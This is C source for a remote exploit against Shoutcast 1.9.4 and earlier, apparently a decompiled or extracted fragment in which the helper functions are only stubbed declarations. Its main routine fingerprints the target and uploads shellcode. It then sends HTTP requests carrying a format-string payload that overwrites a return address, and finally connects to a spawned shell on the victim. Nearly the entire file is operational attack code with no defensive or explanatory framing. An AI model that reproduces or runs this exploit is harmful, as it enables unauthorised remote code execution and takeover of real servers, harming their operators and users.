
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct sockaddr_in {int dummy; } ;
typedef int buffer ;
struct TYPE_2__ {char* platform; int retaddr; int dpa_offset; scalar_t__ retloc; } ;


 int SHELL_PORT ;
 int atoi (char*) ;
 int close (int) ;
 int conn (struct sockaddr_in,int) ;
 int exit (int) ;
 int fflush (int ) ;
 int get_shell (struct sockaddr_in,int,int) ;
 int get_target (struct sockaddr_in,int) ;
 int getopt (int,char**,char*) ;
 int memset (char*,int,int) ;
 char* optarg ;
 int printf (char*,...) ;
 int resolv (struct sockaddr_in*,char*) ;
 int snprintf (char*,int,char*,unsigned short,int,unsigned short,int) ;
 int sockprintf (int,char*,char*) ;
 int stdout ;
 TYPE_1__* targets ;
 int usage (char*) ;
 int write_shellcode (struct sockaddr_in,int,int,int) ;

int main(int argc, char **argv){
    char *hostn = ((void*)0), buffer[1024];
    int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps = 1, wsleeps = 7;
    unsigned short ret1, ret2;
 struct sockaddr_in addr;

    printf("[!] Shoutcast <= 1.9.4 exploit by crash-x\n");

    if (argc < 2)
        usage(argv[0]);

    while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){
        switch (opt){
         case 'h':
             hostn = optarg;
             break;
         case 'p':
                port = atoi(optarg);
                if(port > 65535 || port < 1){
                    printf("[-] Port %d is invalid\n",port);
                    return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                for(i = 0; targets[i].platform; i++);
                if(target >= i){
                    printf("[-] Wtf are you trying to target?\n");
                    usage(argv[0]);
                }
                break;
            case 's':
                sleeps = atoi(optarg);
                break;
            case 'S':
                wsleeps = atoi(optarg);
                break;
         default:
                usage(argv[0]);
        }
    }

    if(hostn == ((void*)0))
        usage(argv[0]);

    resolv(&addr, hostn);

    printf("[!] Connecting to target... ");
    fflush(stdout);
    if(target == 0){
        if((target = get_target(addr, port)) < 0)
            return target;
    } else
        if(get_target(addr, port) == -2)
            exit(-2);

    printf("[!] Targeting: %s\n", targets[target].platform);


    if(write_shellcode(addr, port, target, wsleeps) != -1)
        printf("[+]\n[+] Uploaded shellcode succesful\n");
    else {
        printf("[-]\n[-] Wasn't able to upload shellcode, server probably crashed!\n");
        return -1;
    }

    printf("[!] Writing retaddr [%p] to retloc [%p]\n", (void *)targets[target].retaddr, (void *)targets[target].retloc);


    if((sock = conn(addr, port)) == -1){
        printf("[-] Connecting failed!\n");
        return -1;
    }
    memset(buffer, 0x0, sizeof(buffer));
    *((void **)(buffer)) = (void *)(targets[target].retloc);
    *((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2);
    sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer);
    close(sock);

    ret1 = (targets[target].retaddr & 0xffff0000) >> 16;
    ret2 = (targets[target].retaddr & 0x0000ffff);

    snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn",
            ret1, targets[target].dpa_offset + 1, (ret2 - ret1), targets[target].dpa_offset);

    if((sock = conn(addr, port)) == -1){
        printf("[-] Connecting failed!\n");
        return -1;
    }
    sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer);

    if(get_shell(addr, shell_port, sleeps) == -1){
        printf("[-] Exploit failed\n");
        return -1;
    }
    return 1;
}
